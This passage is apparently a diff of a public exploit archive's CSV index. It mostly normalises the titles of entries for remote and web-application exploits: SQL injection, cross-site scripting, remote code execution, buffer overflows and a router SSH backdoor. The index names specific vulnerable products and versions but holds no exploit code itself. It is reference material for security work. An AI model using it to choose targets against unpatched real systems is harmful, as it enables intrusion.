33578,platforms/multiple/remote/33578.txt,"XAMPP 1.6.x - 'showcode.php' Local File Inclusion",2009-07-16,MustLive,multiple,remote,0 -33580,platforms/hardware/remote/33580.txt,"Comtrend CT-507 IT ADSL Router - 'scvrtsrv.cmd' Cross-Site Scripting",2010-01-29,Yoyahack,hardware,remote,0 +33580,platforms/hardware/remote/33580.txt,"COMTREND CT-507 IT ADSL Router - 'scvrtsrv.cmd' Cross-Site Scripting",2010-01-29,Yoyahack,hardware,remote,0 33095,platforms/windows/remote/33095.rb,"Adobe Flash Player - Type Confusion Remote Code Execution (Metasploit)",2014-04-29,Metasploit,windows,remote,0 33103,platforms/linux/remote/33103.html,"Mozilla Firefox 3.5.1 - Error Page Address Bar URI Spoofing",2009-06-24,"Juan Pablo Lopez Yacubian",linux,remote,0 33118,platforms/multiple/remote/33118.html,"Apple Safari 4.0.1 - Error Page Address Bar URI Spoofing",2009-06-27,"Juan Pablo Lopez Yacubian",multiple,remote,0 @@ -14544,9 +14555,9 @@ id,file,description,date,author,platform,type,port 33215,platforms/multiple/remote/33215.txt,"IBM Tivoli Identity Manager 5.0.5 - User Profile HTML Injection",2009-08-26,IBM,multiple,remote,0 33234,platforms/hardware/remote/33234.txt,"Check Point Connectra R62 - '/Login/Login' Arbitrary Script Injection",2009-09-21,"Stefan Friedli",hardware,remote,0 33257,platforms/hardware/remote/33257.txt,"Juniper Junos 8.5/9.0 J - Web Interface Default URI PATH_INFO Parameter Cross-Site Scripting",2009-09-22,"Amir Azam",hardware,remote,0 -33258,platforms/hardware/remote/33258.txt,"Juniper Junos 8.5/9.0 J-Web Interface - /diagnose Multiple Parameter Cross-Site Scripting",2009-09-22,"Amir Azam",hardware,remote,0 -33259,platforms/hardware/remote/33259.txt,"Juniper Junos 8.5/9.0 J-Web Interface - /configuration Multiple Parameter Cross-Site Scripting",2009-09-22,"Amir Azam",hardware,remote,0 -33260,platforms/hardware/remote/33260.txt,"Juniper Junos 8.5/9.0 J-Web Interface - /scripter.php Multiple Parameter Cross-Site Scripting",2009-09-22,"Amir Azam",hardware,remote,0 +33258,platforms/hardware/remote/33258.txt,"Juniper Junos 8.5/9.0 J-Web Interface - '/diagnose' Multiple Parameter Cross-Site Scripting",2009-09-22,"Amir Azam",hardware,remote,0 +33259,platforms/hardware/remote/33259.txt,"Juniper Junos 8.5/9.0 J-Web Interface - '/configuration' Multiple Parameter Cross-Site Scripting",2009-09-22,"Amir Azam",hardware,remote,0 +33260,platforms/hardware/remote/33260.txt,"Juniper Junos 8.5/9.0 J-Web Interface - '/scripter.php' Multiple Parameter Cross-Site Scripting",2009-09-22,"Amir Azam",hardware,remote,0 33261,platforms/hardware/remote/33261.txt,"Juniper Junos 8.5/9.0 J-Web Interface - Multiple Script m[] Parameter Cross-Site Scripting",2009-09-22,"Amir Azam",hardware,remote,0 33263,platforms/windows/remote/33263.html,"EMC Captiva PixTools 2.2 Distributed Imaging - ActiveX Control Multiple Insecure Method Vulnerabilities",2009-10-01,"Giuseppe Fuggiano",windows,remote,0 33265,platforms/hardware/remote/33265.js,"Palm WebOS 1.0/1.1 - Email Arbitrary Script Injection",2009-10-05,"Townsend Ladd Harris",hardware,remote,0 @@ -14562,7 +14573,7 @@ id,file,description,date,author,platform,type,port 33316,platforms/multiple/remote/33316.java,"Sun Java SE November 2009 - Multiple Vulnerabilities (2)",2009-10-29,Tometzky,multiple,remote,0 33594,platforms/windows/remote/33594.txt,"Microsoft Windows Vista/2008 - ICMPv6 Router Advertisement Remote Code Execution",2010-02-09,"Sumit Gwalani",windows,remote,0 33326,platforms/windows/remote/33326.py,"EFS Easy Chat Server 3.1 - Stack Buffer Overflow",2014-05-12,superkojiman,windows,remote,0 -33331,platforms/windows/remote/33331.rb,"Yokogawa CS3000 - BKESimmgr.exe Buffer Overflow (Metasploit)",2014-05-12,Metasploit,windows,remote,34205 +33331,platforms/windows/remote/33331.rb,"Yokogawa CS3000 - 'BKESimmgr.exe' Buffer Overflow (Metasploit)",2014-05-12,Metasploit,windows,remote,34205 33333,platforms/windows/remote/33333.rb,"Adobe Flash Player - Shader Buffer Overflow (Metasploit)",2014-05-12,Metasploit,windows,remote,0 33363,platforms/multiple/remote/33363.txt,"Opera Web Browser 10.01 - 'dtoa()' Remote Code Execution",2009-11-20,"Maksymilian Arciemowicz",multiple,remote,0 33364,platforms/linux/remote/33364.txt,"KDE 4.3.3 - KDELibs 'dtoa()' Remote Code Execution",2009-11-20,"Maksymilian Arciemowicz",linux,remote,0 @@ -14686,9 +14697,9 @@ id,file,description,date,author,platform,type,port 33990,platforms/multiple/remote/33990.rb,"Gitlist - Unauthenticated Remote Command Execution (Metasploit)",2014-07-07,Metasploit,multiple,remote,80 33991,platforms/php/remote/33991.rb,"WordPress Plugin MailPoet Newsletters 2.6.8 - (wysija-newsletters) Unauthenticated Arbitrary File Upload (Metasploit)",2014-07-07,Metasploit,php,remote,80 34002,platforms/windows/remote/34002.c,"TeamViewer 5.0.8232 - Remote Buffer Overflow",2010-05-18,"fl0 fl0w",windows,remote,0 -34009,platforms/windows/remote/34009.rb,"Yokogawa CS3000 - BKFSim_vhfd.exe Buffer Overflow (Metasploit)",2014-07-08,Metasploit,windows,remote,20010 +34009,platforms/windows/remote/34009.rb,"Yokogawa CS3000 - 'BKFSim_vhfd.exe' Buffer Overflow (Metasploit)",2014-07-08,Metasploit,windows,remote,20010 34013,platforms/windows/remote/34013.txt,"McAfee Email Gateway 6.7.1 - 'systemWebAdminConfig.do' Remote Security Bypass",2010-05-19,"Nahuel Grisolia",windows,remote,0 -34018,platforms/hardware/remote/34018.txt,"U.S.Robotics USR5463 0.06 - Firmware setup_ddns.exe HTML Injection",2010-05-20,SH4V,hardware,remote,0 +34018,platforms/hardware/remote/34018.txt,"U.S.Robotics USR5463 0.06 Firmware - 'setup_ddns.exe' HTML Injection",2010-05-20,SH4V,hardware,remote,0 34026,platforms/linux/remote/34026.py,"OpenVAS Manager 4.0 - Authentication Bypass (PoC)",2014-07-10,EccE,linux,remote,0 34033,platforms/hardware/remote/34033.html,"Cisco DPC2100 2.0.2 r1256-060303 - Multiple Security Bypass / Cross-Site Request Forgery Vulnerabilities",2010-05-24,"Dan Rosenberg",hardware,remote,0 34047,platforms/windows/remote/34047.html,"Home FTP Server 1.10.3 (build 144) - Cross-Site Request Forgery",2010-05-26,"John Leitch",windows,remote,0 @@ -14915,12 +14926,12 @@ id,file,description,date,author,platform,type,port 35612,platforms/windows/remote/35612.pl,"Winamp 5.6.1 - '.m3u8' Remote Buffer Overflow",2011-04-12,KedAns-Dz,windows,remote,0 35614,platforms/windows/remote/35614.c,"EC Software Help & Manual 5.5.1 Build 1296 - 'ijl15.dll' DLL Loading Arbitrary Code Execution",2011-04-14,LiquidWorm,windows,remote,0 35620,platforms/hardware/remote/35620.txt,"Technicolor THOMSON TG585v7 Wireless Router - 'url' Parameter Cross-Site Scripting",2011-04-15,"Edgard Chammas",hardware,remote,0 -35637,platforms/android/remote/35637.py,"WhatsApp 2.11.476 - Remote Reboot/Crash App Android",2014-12-28,"Daniel Godoy",android,remote,0 -35638,platforms/multiple/remote/35638.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - /jde/E1Menu.maf jdeowpBackButtonProtect Parameter Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 -35639,platforms/multiple/remote/35639.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - /jde/E1Menu_Menu.mafService e1.namespace Parameter Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 -35640,platforms/multiple/remote/35640.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - /jde/E1Menu_OCL.mafService e1.namespace Parameter Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 -35641,platforms/multiple/remote/35641.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - /jde/MafletClose.mafService RENDER_MAFLET Parameter Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 -35642,platforms/multiple/remote/35642.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - /jde/JASMafletMafBrowserClose.mafService jdemafjasLinkTarget Parameter Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 +35637,platforms/android/remote/35637.py,"WhatsApp 2.11.476 (Android) - Remote Reboot/Crash App (Denial of Service)",2014-12-28,"Daniel Godoy",android,remote,0 +35638,platforms/multiple/remote/35638.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu.maf' 'jdeowpBackButtonProtect' Parameter Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 +35639,platforms/multiple/remote/35639.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu_Menu.mafService' 'e1.namespace' Parameter Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 +35640,platforms/multiple/remote/35640.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/E1Menu_OCL.mafService' 'e1.namespace' Parameter Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 +35641,platforms/multiple/remote/35641.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/MafletClose.mafService' 'RENDER_MAFLET' Parameter Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 +35642,platforms/multiple/remote/35642.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - '/jde/JASMafletMafBrowserClose.mafService' 'jdemafjasLinkTarget' Parameter Cross-Site Scripting",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 35644,platforms/linux/remote/35644.txt,"Viola DVR VIO-4/1000 - Multiple Directory Traversal Vulnerabilities",2011-04-19,QSecure,linux,remote,0 35652,platforms/windows/remote/35652.sh,"Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 - Unauthenticated Remote Code Execution",2014-12-30,drone,windows,remote,0 35660,platforms/php/remote/35660.rb,"ProjectSend - Arbitrary File Upload (Metasploit)",2014-12-31,Metasploit,php,remote,80 @@ -15118,7 +15129,7 @@ id,file,description,date,author,platform,type,port 37066,platforms/hardware/remote/37066.py,"Phoenix Contact ILC 150 ETH PLC - Remote Control Script",2015-05-20,Photubias,hardware,remote,0 37081,platforms/multiple/remote/37081.py,"McAfee Web Gateway 7.1.5.x - 'Host' HTTP Header Security Bypass",2012-04-16,"Gabriel Menezes Nunes",multiple,remote,0 37097,platforms/ios/remote/37097.py,"FTP Media Server 3.0 - Authentication Bypass / Denial of Service",2015-05-25,"Wh1t3Rh1n0 (Michael Allen)",ios,remote,0 -37141,platforms/hardware/remote/37141.txt,"Linksys WRT54GL (Wireless Router) - Cross-Site Request Forgery",2012-05-08,Kalashinkov3,hardware,remote,0 +37141,platforms/hardware/remote/37141.txt,"Linksys WRT54GL Wireless Router - Cross-Site Request Forgery",2012-05-08,Kalashinkov3,hardware,remote,0 37170,platforms/hardware/remote/37170.rb,"Airties - login-cgi Buffer Overflow (Metasploit)",2015-06-01,Metasploit,hardware,remote,0 37163,platforms/windows/remote/37163.py,"IBM Security AppScan Standard 9.0.2 - OLE Automation Array Remote Code Execution",2015-06-01,"Naser Farhadi",windows,remote,0 37165,platforms/windows/remote/37165.py,"WebDrive 12.2 (Build #4172) - Buffer Overflow (PoC)",2015-06-01,metacom,windows,remote,0 @@ -15245,7 +15256,7 @@ id,file,description,date,author,platform,type,port 38492,platforms/hardware/remote/38492.html,"TP-Link TL-WR1043N Router - Cross-Site Request Forgery",2013-04-24,"Jacob Holcomb",hardware,remote,0 38495,platforms/hardware/remote/38495.html,"Belkin F5D8236-4 Router - Cross-Site Request Forgery",2013-04-25,"Jacob Holcomb",hardware,remote,0 38500,platforms/windows/remote/38500.php,"HTML Compiler - Remote Code Execution",2015-10-20,"Ehsan Noreddini",windows,remote,0 -38501,platforms/hardware/remote/38501.txt,"Cisco Linksys E4200 - /apply.cgi Multiple Parameter Cross-Site Scripting",2013-04-27,"Carl Benedict",hardware,remote,0 +38501,platforms/hardware/remote/38501.txt,"Cisco Linksys E4200 - '/apply.cgi' Multiple Parameter Cross-Site Scripting",2013-04-27,"Carl Benedict",hardware,remote,0 38505,platforms/php/remote/38505.rb,"Zpanel - Remote Unauthenticated Remote Code Execution (Metasploit)",2015-10-21,Metasploit,php,remote,0 38512,platforms/windows/remote/38512.php,"The World Browser 3.0 Final - Remote Code Execution",2015-10-22,"Ehsan Noreddini",windows,remote,0 38513,platforms/windows/remote/38513.txt,"TeamSpeak Client 3.0.18.1 - Remote File Inclusion to Remote Code Execution",2015-10-22,Scurippio,windows,remote,0 @@ -15343,16 +15354,16 @@ id,file,description,date,author,platform,type,port 39008,platforms/windows/remote/39008.py,"Easy File Sharing Web Server 7.2 - GET HTTP Request Buffer Overflow (SEH)",2015-12-16,ArminCyber,windows,remote,80 39009,platforms/windows/remote/39009.py,"Easy File Sharing Web Server 7.2 - HEAD HTTP Request Buffer Overflow (SEH)",2015-12-16,ArminCyber,windows,remote,80 39018,platforms/multiple/remote/39018.txt,"Oracle Supply Chain Products Suite - Remote Security",2014-01-14,Oracle,multiple,remote,0 -39074,platforms/cgi/remote/39074.txt,"Seowon Intech WiMAX SWC-9100 Router - /cgi-bin/diagnostic.cgi ping_ipaddr Parameter Remote Code Execution",2014-02-03,"Josue Rojas",cgi,remote,0 +39074,platforms/cgi/remote/39074.txt,"Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/diagnostic.cgi' 'ping_ipaddr' Parameter Remote Code Execution",2014-02-03,"Josue Rojas",cgi,remote,0 39105,platforms/windows/remote/39105.py,"VideoCharge Studio - 'CHTTPResponse::GetHttpResponse()' Function Stack Buffer Overflow",2014-02-19,"Julien Ahrens",windows,remote,0 39104,platforms/multiple/remote/39104.py,"Dassault Systemes Catia - Stack Buffer Overflow",2014-02-19,"Mohamed Shetta",multiple,remote,0 -39089,platforms/hardware/remote/39089.txt,"Netgear D6300B - /diag.cgi IPAddr4 Parameter Remote Command Execution",2014-02-05,"Marcel Mangold",hardware,remote,0 +39089,platforms/hardware/remote/39089.txt,"Netgear D6300B - '/diag.cgi' 'IPAddr4' Parameter Remote Command Execution",2014-02-05,"Marcel Mangold",hardware,remote,0 39114,platforms/ios/remote/39114.txt,"Apple iOS 4.2.1 - 'facetime-audio://' Security Bypass",2014-03-10,"Guillaume Ross",ios,remote,0 39115,platforms/multiple/remote/39115.py,"ET - Chat Password Reset Security Bypass",2014-03-09,IRH,multiple,remote,0 39119,platforms/windows/remote/39119.py,"KiTTY Portable 0.65.0.2p (Windows XP/7/10) - Chat Remote Buffer Overflow (SEH)",2015-12-29,"Guillaume Kaddouch",windows,remote,0 39138,platforms/hardware/remote/39138.html,"ICOMM 610 Wireless Modem - Cross-Site Request Forgery",2014-04-12,"Blessen Thomas",hardware,remote,0 39227,platforms/hardware/remote/39227.txt,"FingerTec Fingerprint Reader - Remote Access and Remote Enrolment",2016-01-12,"Daniel Lawson",hardware,remote,0 -39154,platforms/hardware/remote/39154.txt,"Comtrend CT-5361T Router - Password.cgi Cross-Site Request Forgery (Admin Password Manipulation)",2014-04-21,"TUNISIAN CYBER",hardware,remote,0 +39154,platforms/hardware/remote/39154.txt,"COMTREND CT-5361T Router - 'Password.cgi' Cross-Site Request Forgery (Admin Password Manipulation)",2014-04-21,"TUNISIAN CYBER",hardware,remote,0 39155,platforms/linux/remote/39155.txt,"lxml - 'clean_html' Function Security Bypass",2014-04-15,"Maksim Kochkin",linux,remote,0 39161,platforms/windows/remote/39161.py,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)",2016-01-04,"Avinash Thapa",windows,remote,0 39175,platforms/multiple/remote/39175.py,"AssistMyTeam Team Helpdesk - Multiple Information Disclosure Vulnerabilities",2014-05-05,bhamb,multiple,remote,0 @@ -15366,8 +15377,8 @@ id,file,description,date,author,platform,type,port 39218,platforms/windows/remote/39218.html,"Trend Micro - node.js HTTP Server Listening on localhost Can Execute Commands",2016-01-11,"Google Security Research",windows,remote,0 39222,platforms/multiple/remote/39222.txt,"Foreman Smart-Proxy - Remote Command Injection",2014-06-05,"Lukas Zapletal",multiple,remote,0 39224,platforms/hardware/remote/39224.py,"Fortigate OS 4.x < 5.0.7 - SSH Backdoor",2016-01-12,operator8203,hardware,remote,22 -39258,platforms/multiple/remote/39258.txt,"Alfresco - /proxy endpoint Parameter Server-Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0 -39259,platforms/multiple/remote/39259.txt,"Alfresco - /cmisbrowser url Parameter Server-Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0 +39258,platforms/multiple/remote/39258.txt,"Alfresco - '/proxy' 'endpoint' Parameter Server-Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0 +39259,platforms/multiple/remote/39259.txt,"Alfresco - '/cmisbrowser' 'url' Parameter Server-Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0 39455,platforms/multiple/remote/39455.txt,"Inductive Automation Ignition 7.8.1 - Remote Leakage Of Shared Buffers",2016-02-17,LiquidWorm,multiple,remote,0 39278,platforms/hardware/remote/39278.txt,"Barracuda Web Application Firewall - Authentication Bypass",2014-08-04,"Nick Hayes",hardware,remote,0 39292,platforms/multiple/remote/39292.pl,"Granding MA300 - Traffic Sniffing MitM Fingerprint PIN Disclosure",2014-08-26,"Eric Sesterhenn",multiple,remote,0 @@ -16427,7 +16438,7 @@ id,file,description,date,author,platform,type,port 1202,platforms/php/webapps/1202.php,"PBLang 4.65 - Remote Command Execution (2)",2005-09-07,RusH,php,webapps,0 1207,platforms/php/webapps/1207.php,"Class-1 Forum 0.24.4 - Remote Code Execution",2005-09-09,rgod,php,webapps,0 1208,platforms/php/webapps/1208.pl,"phpMyFamily 1.4.0 - SQL Injection",2005-03-27,basher13,php,webapps,0 -1211,platforms/php/webapps/1211.pl,"PhpTagCool 1.0.3 - SQL Injection Attacks Exploit",2005-09-11,Megabyte,php,webapps,0 +1211,platforms/php/webapps/1211.pl,"PhpTagCool 1.0.3 - SQL Injection",2005-09-11,Megabyte,php,webapps,0 1214,platforms/php/webapps/1214.php,"AzDGDatingLite 2.1.3 - Remote Code Execution",2005-09-13,rgod,php,webapps,0 1217,platforms/php/webapps/1217.pl,"phpWebSite 0.10.0 - (module) SQL Injection",2005-09-15,RusH,php,webapps,0 1219,platforms/php/webapps/1219.c,"PHP-Nuke 7.8 - 'modules.php' SQL Injection",2005-09-16,RusH,php,webapps,0 @@ -16475,7 +16486,7 @@ id,file,description,date,author,platform,type,port 1370,platforms/php/webapps/1370.php,"phpCOIN 1.2.2 - 'phpcoinsessid' SQL Injection / Remote Code Execution",2005-12-12,rgod,php,webapps,0 1373,platforms/php/webapps/1373.php,"Limbo 1.0.4.2 - _SERVER[REMOTE_ADDR] Overwrite Remote Exploit",2005-12-14,rgod,php,webapps,0 1379,platforms/php/webapps/1379.php,"PHPGedView 3.3.7 - Remote Code Execution",2005-12-20,rgod,php,webapps,0 -1382,platforms/php/webapps/1382.pl,"phpBB 2.0.18 - Remote Brute Force/Dictionary Attack Tool (2)",2006-02-20,DarkFig,php,webapps,0 +1382,platforms/php/webapps/1382.pl,"phpBB 2.0.18 - Remote Brute Force/Dictionary (2)",2006-02-20,DarkFig,php,webapps,0 1383,platforms/php/webapps/1383.txt,"phpBB 2.0.18 - Cross-Site Scripting / Cookie Disclosure",2005-12-21,jet,php,webapps,0 1385,platforms/php/webapps/1385.pl,"PHP-Fusion 6.00.3 - 'rating' Parameter SQL Injection",2005-12-23,krasza,php,webapps,0 1387,platforms/php/webapps/1387.php,"Dev Web Management System 1.5 - (cat) SQL Injection",2005-12-24,rgod,php,webapps,0 @@ -16555,7 +16566,7 @@ id,file,description,date,author,platform,type,port 1570,platforms/php/webapps/1570.pl,"Light Weight Calendar 1.x - (date) Remote Code Execution",2006-03-09,Hessam-x,php,webapps,0 1571,platforms/asp/webapps/1571.htm,"JiRos Banner Experience 1.0 - (Create Authentication Bypass) Remote Exploit",2006-03-09,nukedx,asp,webapps,0 1575,platforms/php/webapps/1575.pl,"Guestbook Script 1.7 - (include_files) Remote Code Execution",2006-03-11,rgod,php,webapps,0 -1576,platforms/php/webapps/1576.txt,"Jupiter CMS 1.1.5 - Multiple Cross-Site Scripting Attack Vectors",2006-03-11,Nomenumbra,php,webapps,0 +1576,platforms/php/webapps/1576.txt,"Jupiter CMS 1.1.5 - Multiple Cross-Site Scripting",2006-03-11,Nomenumbra,php,webapps,0 1581,platforms/php/webapps/1581.pl,"Simple PHP Blog 0.4.7.1 - Remote Command Execution",2006-03-13,rgod,php,webapps,0 1585,platforms/php/webapps/1585.php,"PHP iCalendar 2.21 - 'cookie' Remote Code Execution",2006-03-15,rgod,php,webapps,0 1586,platforms/php/webapps/1586.php,"PHP iCalendar 2.21 - 'publish.ical.php' Remote Code Execution",2006-03-15,rgod,php,webapps,0 @@ -17578,7 +17589,7 @@ id,file,description,date,author,platform,type,port 3018,platforms/php/webapps/3018.txt,"mxBB Module pafiledb 2.0.1b - Remote File Inclusion",2006-12-26,bd0rk,php,webapps,0 3019,platforms/php/webapps/3019.txt,"myPHPCalendar 10192000b - (cal_dir) Remote File Inclusion",2006-12-26,Cr@zy_King,php,webapps,0 3020,platforms/php/webapps/3020.pl,"PHP-Update 2.7 - 'admin/uploads.php' Remote Code Execution",2006-12-26,undefined1_,php,webapps,0 -3025,platforms/php/webapps/3025.pl,"Yrch 1.0 - 'plug.inc.php path Variable' Remote File Inclusion",2006-12-27,DeltahackingTEAM,php,webapps,0 +3025,platforms/php/webapps/3025.pl,"Yrch 1.0 - 'plug.inc.php' 'path' Parameter Remote File Inclusion",2006-12-27,DeltahackingTEAM,php,webapps,0 3026,platforms/php/webapps/3026.txt,"Bubla 1.0.0rc2 - 'bu/process.php' Remote File Inclusion",2006-12-27,DeltahackingTEAM,php,webapps,0 3027,platforms/php/webapps/3027.txt,"Fantastic News 2.1.4 - Multiple Remote File Inclusion",2006-12-27,Mr-m07,php,webapps,0 3028,platforms/php/webapps/3028.txt,"Limbo CMS Module event 1.0 - Remote File Inclusion",2006-12-27,"Mehmet Ince",php,webapps,0 @@ -17603,7 +17614,7 @@ id,file,description,date,author,platform,type,port 3057,platforms/php/webapps/3057.php,"MDForum 2.0.1 - (PNSVlang) Remote Code Execution",2006-12-31,Kacper,php,webapps,0 3059,platforms/php/webapps/3059.txt,"Bubla 0.9.2 - (bu_dir) Multiple Remote File Inclusion",2006-12-31,DeltahackingTEAM,php,webapps,0 3060,platforms/asp/webapps/3060.txt,"RBlog 1.0 - 'admin.mdb' Remote Password Disclosure",2007-01-01,"Aria-Security Team",asp,webapps,0 -3061,platforms/asp/webapps/3061.txt,"Vizayn Haber - 'haberdetay.asp id Variable' SQL Injection",2007-01-01,chernobiLe,asp,webapps,0 +3061,platforms/asp/webapps/3061.txt,"Vizayn Haber - 'haberdetay.asp' 'id' Parameter SQL Injection",2007-01-01,chernobiLe,asp,webapps,0 3062,platforms/asp/webapps/3062.txt,"AutoDealer 2.0 - 'detail.asp iPro' SQL Injection",2007-01-01,ajann,asp,webapps,0 3065,platforms/cgi/webapps/3065.txt,"WWWBoard 2.0 - 'passwd.txt' Remote Password Disclosure",2007-01-01,bd0rk,cgi,webapps,0 3066,platforms/asp/webapps/3066.txt,"NewsCMSLite - 'newsCMS.mdb' Remote Password Disclosure",2007-01-01,KaBuS,asp,webapps,0 @@ -17614,7 +17625,7 @@ id,file,description,date,author,platform,type,port 3076,platforms/php/webapps/3076.php,"Simple Web Content Management System - SQL Injection",2007-01-03,DarkFig,php,webapps,0 3079,platforms/php/webapps/3079.txt,"Aratix 0.2.2b11 - 'inc/init.inc.php' Remote File Inclusion",2007-01-04,nuffsaid,php,webapps,0 3081,platforms/asp/webapps/3081.pl,"DigiRez 3.4 - (book_id) SQL Injection",2007-01-04,ajann,asp,webapps,0 -3082,platforms/php/webapps/3082.txt,"iG Calendar 1.0 - 'user.php id Variable' SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0 +3082,platforms/php/webapps/3082.txt,"iG Calendar 1.0 - 'user.php' 'id' Parameter SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0 3083,platforms/php/webapps/3083.txt,"ig shop 1.0 - Code Execution / SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0 3085,platforms/php/webapps/3085.php,"Coppermine Photo Gallery 1.4.10 - 'xpl.php' SQL Injection",2007-01-05,DarkFig,php,webapps,0 3089,platforms/asp/webapps/3089.txt,"QUOTE&ORDERING SYSTEM 1.0 - 'ordernum' Multiple Vulnerabilities",2007-01-05,ajann,asp,webapps,0 @@ -17645,7 +17656,7 @@ id,file,description,date,author,platform,type,port 3125,platforms/php/webapps/3125.c,"JV2 Folder Gallery 3.0 - 'download.php' Remote File Disclosure",2007-01-14,PeTrO,php,webapps,0 3134,platforms/php/webapps/3134.php,"KGB 1.9 - 'sesskglogadmin.php' Local File Inclusion",2007-01-15,Kacper,php,webapps,0 3135,platforms/asp/webapps/3135.txt,"Okul Web Otomasyon Sistemi 4.0.1 - SQL Injection",2007-01-15,"ilker Kandemir",asp,webapps,0 -3141,platforms/php/webapps/3141.pl,"MGB 0.5.4.5 - 'email.php id Variable' SQL Injection",2007-01-17,SlimTim10,php,webapps,0 +3141,platforms/php/webapps/3141.pl,"MGB 0.5.4.5 - 'email.php' 'id' Parameter SQL Injection",2007-01-17,SlimTim10,php,webapps,0 3143,platforms/php/webapps/3143.php,"Woltlab Burning Board 1.0.2 / 2.3.6 - search.php SQL Injection (1)",2007-01-17,"silent vapor",php,webapps,0 3144,platforms/php/webapps/3144.pl,"Woltlab Burning Board 1.0.2 / 2.3.6 - search.php SQL Injection (2)",2007-01-17,trew,php,webapps,0 3145,platforms/php/webapps/3145.txt,"PHPMyphorum 1.5a - 'mep/frame.php' Remote File Inclusion",2007-01-17,v1per-haCker,php,webapps,0 @@ -18550,7 +18561,7 @@ id,file,description,date,author,platform,type,port 4638,platforms/php/webapps/4638.txt,"skyportal vrc6 - Multiple Vulnerabilities",2007-11-20,BugReport.IR,php,webapps,0 4639,platforms/php/webapps/4639.htm,"Ucms 1.8 - Backdoor Remote Command Execution",2007-11-21,D4m14n,php,webapps,0 4640,platforms/php/webapps/4640.txt,"TalkBack 2.2.7 - Multiple Remote File Inclusion",2007-11-21,NoGe,php,webapps,0 -4641,platforms/php/webapps/4641.txt,"Alstrasoft e-Friends 4.98 - (seid) Multiple SQL Injection",2007-11-21,K-159,php,webapps,0 +4641,platforms/php/webapps/4641.txt,"Alstrasoft e-Friends 4.98 - 'seid' Multiple SQL Injections",2007-11-21,K-159,php,webapps,0 4642,platforms/php/webapps/4642.txt,"DevMass Shopping Cart 1.0 - Remote File Inclusion",2007-11-22,S.W.A.T.,php,webapps,0 4643,platforms/php/webapps/4643.py,"VigileCMS 1.8 - Stealth Remote Command Execution",2007-11-22,The:Paradox,php,webapps,0 4644,platforms/asp/webapps/4644.txt,"NetAuctionHelp 4.1 - (nsearch) SQL Injection",2007-11-22,"Aria-Security Team",asp,webapps,0 @@ -18681,7 +18692,7 @@ id,file,description,date,author,platform,type,port 4816,platforms/php/webapps/4816.txt,"SanyBee Gallery 0.1.1 - (p) Local File Inclusion",2007-12-30,jackal,php,webapps,0 4817,platforms/php/webapps/4817.txt,"w-Agora 4.2.1 - 'cat' Parameter SQL Injection",2007-12-30,IHTeam,php,webapps,0 4821,platforms/php/webapps/4821.txt,"IPTBB 0.5.4 - 'id' Parameter SQL Injection",2007-12-31,MhZ91,php,webapps,0 -4822,platforms/php/webapps/4822.txt,"MyPHP Forum 3.0 - (Final) Multiple SQL Injection",2007-12-31,x0kster,php,webapps,0 +4822,platforms/php/webapps/4822.txt,"MyPHP Forum 3.0 (Final) - Multiple SQL Injections",2007-12-31,x0kster,php,webapps,0 4823,platforms/php/webapps/4823.pl,"ZenPhoto 1.1.3 - 'rss.php albumnr' SQL Injection",2007-12-31,Silentz,php,webapps,0 4824,platforms/asp/webapps/4824.py,"oneSCHOOL - admin/login.asp SQL Injection",2007-12-31,Guga360,asp,webapps,0 4826,platforms/php/webapps/4826.pl,"WebPortal CMS 0.6.0 - 'index.php' SQL Injection",2007-12-31,x0kster,php,webapps,0 @@ -19634,7 +19645,7 @@ id,file,description,date,author,platform,type,port 6035,platforms/php/webapps/6035.txt,"DreamNews Manager - 'id' Parameter SQL Injection",2008-07-10,"Hussin X",php,webapps,0 6036,platforms/php/webapps/6036.txt,"gapicms 9.0.2 - 'dirDepth' Parameter Remote File Inclusion",2008-07-10,"Ghost Hacker",php,webapps,0 6037,platforms/php/webapps/6037.txt,"phpDatingClub 3.7 - 'website.php' Local File Inclusion",2008-07-10,S.W.A.T.,php,webapps,0 -6040,platforms/php/webapps/6040.txt,"File Store PRO 3.2 - Multiple Blind SQL Injection",2008-07-11,"Nu Am Bani",php,webapps,0 +6040,platforms/php/webapps/6040.txt,"File Store PRO 3.2 - Multiple Blind SQL Injections",2008-07-11,"Nu Am Bani",php,webapps,0 6041,platforms/php/webapps/6041.txt,"facebook newsroom CMS 0.5.0 Beta 1 - Remote File Inclusion",2008-07-11,Ciph3r,php,webapps,0 6042,platforms/php/webapps/6042.txt,"Wysi Wiki Wyg 1.0 - Local File Inclusion / Cross-Site Scripting / PHPInfo",2008-10-20,StAkeR,php,webapps,0 6044,platforms/php/webapps/6044.txt,"Million Pixels 3 - 'id_cat' Parameter SQL 